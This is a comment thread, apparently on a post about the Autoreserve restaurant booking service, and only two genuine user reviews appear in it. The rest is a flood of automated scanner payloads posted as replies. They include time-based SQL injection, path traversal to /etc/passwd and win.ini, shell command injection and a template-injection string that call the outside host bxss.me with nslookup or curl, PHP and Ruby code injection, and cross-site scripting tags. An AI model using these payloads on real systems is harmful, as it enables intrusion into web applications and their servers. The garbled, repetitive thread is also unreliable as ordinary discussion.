M3ubbquj')) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@nLkcS
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Doesn't seem very useful. Tried booking a number of restaurants throughout the day and it refused to let me log in as I have login too many times. And frequency of calls seems to be in the range of every 40 mins once. Might be good for only those less popular restaurants.
re: guest
DbQKdeAx
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+177-177-1=0+0+0+1
re: guest
-1 OR 3+177-177-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
X8pzX1pe'; waitfor delay '0:0:15' --
re: guest
-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--
re: guest
-5) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
re: guest
-1)) OR 630=(SELECT 630 FROM PG_SLEEP(15))--
re: guest
bo5YKqYZ' OR 374=(SELECT 374 FROM PG_SLEEP(15))--
re: guest
Jj7DFq7C') OR 747=(SELECT 747 FROM PG_SLEEP(15))--
re: guest
ahB3lTmv')) OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@NSW3a
re: guest
dxF8Jf1j
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+796-796-1=0+0+0+1
re: guest
-1 OR 3+796-796-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
UN2AguTh'; waitfor delay '0:0:15' --
re: guest
-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--
re: guest
-5) OR 549=(SELECT 549 FROM PG_SLEEP(15))--
re: guest
-1)) OR 216=(SELECT 216 FROM PG_SLEEP(15))--
re: guest
gHIGZ9rX' OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: guest
pjYNWCOY') OR 708=(SELECT 708 FROM PG_SLEEP(15))--
re: guest
Wq5QGHwc')) OR 378=(SELECT 378 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@95F8l
re: guest
1gkc4goQO
re: guest
response.write(9382382*9986103)
re: guest
'+response.write(9382382*9986103)+'
re: guest
"+response.write(9382382*9986103)+"
re: guest
%0abcc:074625.67-13784.67.3bdc6.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-13785.67.3bdc6.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999960+9999849}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
'.gethostbyname(lc('hitbc'.'atcrftdo8323c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(74).chr(110).chr(72).'
re: guest
)
re: guest
".gethostbyname(lc("hitls"."uqvcevvc03c1b.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(67).chr(104).chr(82)."
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
!(()&&!|*|*|
re: guest
/etc/passwd
re: guest
echo omlcrd$()\ pvxnfp\nz^xyu||a #' &echo omlcrd$()\ pvxnfp\nz^xyu||a #|" &echo omlcrd$()\ pvxnfp\nz^xyu||a #
re: guest
^(#$!@#$)(()))******
re: guest
%2fetc%2fpasswd
re: guest
&echo dyylsq$()\ tzmaeh\nz^xyu||a #' &echo dyylsq$()\ tzmaeh\nz^xyu||a #|" &echo dyylsq$()\ tzmaeh\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo dfsvca$()\ cbsyte\nz^xyu||a #' |echo dfsvca$()\ cbsyte\nz^xyu||a #|" |echo dfsvca$()\ cbsyte\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitqlvsyodpne0fa67.bxss.me||perl -e "gethostbyname('hitqlvsyodpne0fa67.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hitlgqzoizlfka82a8.bxss.me||perl -e "gethostbyname('hitlgqzoizlfka82a8.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitjmoiqzlngqdffeb.bxss.me&'\"`0&nslookup hitjmoiqzlngqdffeb.bxss.me&`'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&'\"`0&(nslookup hittkuttjidym4789a.bxss.me||perl -e "gethostbyname('hittkuttjidym4789a.bxss.me')")&`'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(102).concat(72).concat(120).concat(83)+(require"socket"
Socket.gethostbyname("hitbg"+"ouegvlqp0a3d2.bxss.me.")[3].to_s)+"
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hitvoueqpzvbg87102.bxss.me||perl -e "gethostbyname('hitvoueqpzvbg87102.bxss.me')")
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(99).concat(66).concat(104).concat(90)+(require'socket'
Socket.gethostbyname('hitez'+'wpjellxue1b27.bxss.me.')[3].to_s)+'
re: guest
Http://bxss.me/t/fit.txt
re: guest
file:///etc/passwd
re: guest
`(nslookup hitvdonfbvisp396c5.bxss.me||perl -e "gethostbyname('hitvdonfbvisp396c5.bxss.me')")`
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
;(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")|(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")&(nslookup hitcausnahteg23036.bxss.me||perl -e "gethostbyname('hitcausnahteg23036.bxss.me')")
re: guest
/etc/shells
re: guest
/WEB-INF/web.xml
re: guest
c:/windows/win.ini
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
bxss.me
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
';print(md5(31337));$a='
re: guest
/../../../../../../../../../../boot.ini
re: guest
";print(md5(31337));$a="
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
'.print(md5(31337)).'
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+716-716-1=0+0+0+1 --
re: guest
-1 OR 3+716-716-1=0+0+0+1 --
re: guest
-1 OR 2+249-249-1=0+0+0+1
re: guest
-1 OR 3+249-249-1=0+0+0+1
re: guest
-1' OR 2+884-884-1=0+0+0+1 --
re: guest
-1' OR 3+884-884-1=0+0+0+1 --
re: guest
-1' OR 2+556-556-1=0+0+0+1 or '4K5zCJv3'='
re: guest
-1' OR 3+556-556-1=0+0+0+1 or '4K5zCJv3'='
re: guest
-1" OR 2+975-975-1=0+0+0+1 --
re: guest
-1" OR 3+975-975-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
ww0tV5jQ'; waitfor delay '0:0:15' --
re: guest
-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))--
re: guest
-5) OR 573=(SELECT 573 FROM PG_SLEEP(15))--
re: guest
-1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--
re: guest
W9GN419h' OR 355=(SELECT 355 FROM PG_SLEEP(15))--
re: guest
Hi4GjAeP') OR 882=(SELECT 882 FROM PG_SLEEP(15))--
re: guest
3MPIpRvn')) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@uJusW
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1I66SF4BE0
re: guest
response.write(9422559*9040641)
re: guest
'+response.write(9422559*9040641)+'
re: guest
"+response.write(9422559*9040641)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${10000337+9999163}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
'.gethostbyname(lc('hityk'.'mpfnqvel38a9b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(81).chr(102).chr(76).'
re: guest
".gethostbyname(lc("hitkb"."rhmryffp6bbbf.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(70).chr(120).chr(71)."
re: guest
gethostbyname(lc('hithu'.'pfuplzgrf91f7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(83).chr(118).chr(86)
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
'"
re: guest
bxss.me/t/xss.html?%00
re: guest
<!--
re: guest
"+"A".concat(70-3).concat(22*4).concat(110).concat(76).concat(101).concat(75)+(require"socket"
Socket.gethostbyname("hitou"+"dpqrcxfa113ff.bxss.me.")[3].to_s)+"
re: guest
replies
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
'+'A'.concat(70-3).concat(22*4).concat(111).concat(71).concat(107).concat(79)+(require'socket'
Socket.gethostbyname('hitne'+'rxsgdzuj0bc5b.bxss.me.')[3].to_s)+'
re: guest
replies
re: guest
';print(md5(31337));$a='
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: guest
'A'.concat(70-3).concat(22*4).concat(111).concat(81).concat(110).concat(80)+(require'socket'
Socket.gethostbyname('hitan'+'jltgyibz2363d.bxss.me.')[3].to_s)
re: guest
replies/.
re: guest
";print(md5(31337));$a="
re: guest
/etc/shells
re: guest
'"()&%<zzz><ScRiPt >WFLn(9883)</ScRiPt>
re: guest
${@print(md5(31337))}
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
echo mogtnz$()\ webkom\nz^xyu||a #' &echo mogtnz$()\ webkom\nz^xyu||a #|" &echo mogtnz$()\ webkom\nz^xyu||a #
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbyesjzkeqv78e6f.bxss.me")}}
re: guest
${@print(md5(31337))}\
re: guest
c:/windows/win.ini
re: guest
&echo msnrty$()\ tgxrqi\nz^xyu||a #' &echo msnrty$()\ tgxrqi\nz^xyu||a #|" &echo msnrty$()\ tgxrqi\nz^xyu||a #
re: guest
'"()&%<zzz><ScRiPt >WFLn(9597)</ScRiPt>
re: guest
'.print(md5(31337)).'
re: guest
bxss.me
re: guest
|echo lmstfc$()\ kraykb\nz^xyu||a #' |echo lmstfc$()\ kraykb\nz^xyu||a #|" |echo lmstfc$()\ kraykb\nz^xyu||a #
re: guest
9820558
re: guest
Http://bxss.me/t/fit.txt
re: guest
expr 9000417803 - 977786
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
(nslookup -q=cname hitmbqbjxyinc3ae53.bxss.me||curl hitmbqbjxyinc3ae53.bxss.me))
re: guest
'"()
re: guest
$(nslookup -q=cname hitbekxgsgchu3cba7.bxss.me||curl hitbekxgsgchu3cba7.bxss.me)
re: guest
'&&sleep(27*1000)*llqear&&'
re: guest
&nslookup -q=cname hityoyvytbehq4126b.bxss.me&'\"`0&nslookup -q=cname hityoyvytbehq4126b.bxss.me&`'
re: guest
"&&sleep(27*1000)*iqlhvg&&"
re: guest
&(nslookup -q=cname hityabblvwrve48c2d.bxss.me||curl hityabblvwrve48c2d.bxss.me)&'\"`0&(nslookup -q=cname hityabblvwrve48c2d.bxss.me||curl hityabblvwrve48c2d.bxss.me)&`'
re: guest
'||sleep(27*1000)*ncaczc||'
re: guest
|(nslookup -q=cname hittfrusjzlza8fe7b.bxss.me||curl hittfrusjzlza8fe7b.bxss.me)
re: guest
"||sleep(27*1000)*ayjnke||"
re: guest
`(nslookup -q=cname hithrazrbxtkz79016.bxss.me||curl hithrazrbxtkz79016.bxss.me)`
re: guest
;(nslookup -q=cname hituaesljcsoi42360.bxss.me||curl hituaesljcsoi42360.bxss.me)|(nslookup -q=cname hituaesljcsoi42360.bxss.me||curl hituaesljcsoi42360.bxss.me)&(nslookup -q=cname hituaesljcsoi42360.bxss.me||curl hituaesljcsoi42360.bxss.me)
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitdypjyohapq69542.bxss.me||curl${IFS}hitdypjyohapq69542.bxss.me)
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitzsgliigxktafda3.bxss.me||curl${IFS}hitzsgliigxktafda3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzsgliigxktafda3.bxss.me||curl${IFS}hitzsgliigxktafda3.bxss.me)&`'
re: guest
4OZqvUXn
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
JPUPITXL'; waitfor delay '0:0:15' --
re: guest
-1 OR 942=(SELECT 942 FROM PG_SLEEP(15))--
re: guest
-1) OR 770=(SELECT 770 FROM PG_SLEEP(15))--
re: guest
-1)) OR 328=(SELECT 328 FROM PG_SLEEP(15))--
re: guest
dZCtUn8U' OR 550=(SELECT 550 FROM PG_SLEEP(15))--
re: guest
PzTUSeuZ') OR 753=(SELECT 753 FROM PG_SLEEP(15))--
re: guest
YP22fnaa')) OR 707=(SELECT 707 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@QIkFM
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Tried using it to book Sharikimon Chawanbu, and received an unsuccessful response after 3 days (they tried for 2 days but couldn’t get through).
Succeeded in reserving twice on previous occasions by simply calling, and didn’t find it to be a terribly hard reservation to make. So I wasn’t impressed with Autoreserve, haha.
re: JJ
BfMfVSXp
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+22-22-1=0+0+0+1
re: JJ
-1 OR 3+22-22-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
